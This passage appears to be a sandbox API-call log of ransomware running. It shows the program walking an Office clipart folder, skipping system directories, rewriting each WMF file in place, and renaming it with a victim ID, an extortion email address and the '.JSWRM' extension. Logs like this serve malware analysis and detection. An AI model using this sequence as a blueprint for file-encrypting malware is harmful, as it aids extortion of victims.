lstrcmpiW (lpString1="J0213243.WMF", lpString2="documents and settings") returned 1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="system volume information") returned -1 [0087.926] lstrcmpiW (lpString1="J0213243.WMF", lpString2="msocache") returned -1 [0087.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0087.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213243.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213243.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0213243.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0087.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0087.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213243.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213243.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0213243.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0087.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0087.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.927] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2652) returned 1 [0087.927] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa50) returned 0x22fd48 [0087.927] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa50, lpOverlapped=0x0) returned 1 [0087.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.929] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa50, lpOverlapped=0x0) returned 1 [0087.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0087.929] CloseHandle (hObject=0x314) returned 1 [0087.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0087.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0087.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0087.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0087.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0087.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.933] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0087.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.934] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0213449.WMF", cAlternateFileName="")) returned 1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2=".") returned 1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="..") returned 1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="...") returned 1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="windows") returned -1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="recovery") returned -1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="perflogs") returned -1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="documents and settings") returned 1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="system volume information") returned -1 [0087.934] lstrcmpiW (lpString1="J0213449.WMF", lpString2="msocache") returned -1 [0087.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213449.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213449.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0213449.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213449.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0213449.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0213449.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.941] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3840) returned 1 [0087.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf00) returned 0x23fc98 [0087.941] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf00, lpOverlapped=0x0) returned 1 [0087.943] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.943] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf00, lpOverlapped=0x0) returned 1 [0087.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0087.943] CloseHandle (hObject=0x314) returned 1 [0087.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0087.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0087.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0087.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0087.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.944] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7cb6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0214934.WMF", cAlternateFileName="")) returned 1 [0087.944] lstrcmpiW (lpString1="J0214934.WMF", lpString2=".") returned 1 [0087.944] lstrcmpiW (lpString1="J0214934.WMF", lpString2="..") returned 1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="...") returned 1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="windows") returned -1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="recovery") returned -1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="perflogs") returned -1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="documents and settings") returned 1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="system volume information") returned -1 [0087.945] lstrcmpiW (lpString1="J0214934.WMF", lpString2="msocache") returned -1 [0087.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0087.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214934.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214934.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0214934.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0087.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214934.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214934.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0214934.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.945] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31926) returned 1 [0087.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7cb0) returned 0x24d210 [0087.946] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7cb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7cb0, lpOverlapped=0x0) returned 1 [0087.949] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.949] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7cb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7cb0, lpOverlapped=0x0) returned 1 [0087.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.950] CloseHandle (hObject=0x314) returned 1 [0087.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0087.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0087.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0087.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0087.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0087.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0087.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0087.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0087.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.951] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaefa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0214948.WMF", cAlternateFileName="")) returned 1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2=".") returned 1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="..") returned 1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="...") returned 1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="windows") returned -1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="recovery") returned -1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="perflogs") returned -1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="documents and settings") returned 1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="system volume information") returned -1 [0087.951] lstrcmpiW (lpString1="J0214948.WMF", lpString2="msocache") returned -1 [0087.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0087.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214948.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214948.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0214948.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0087.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0087.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214948.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0214948.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0214948.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0087.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, 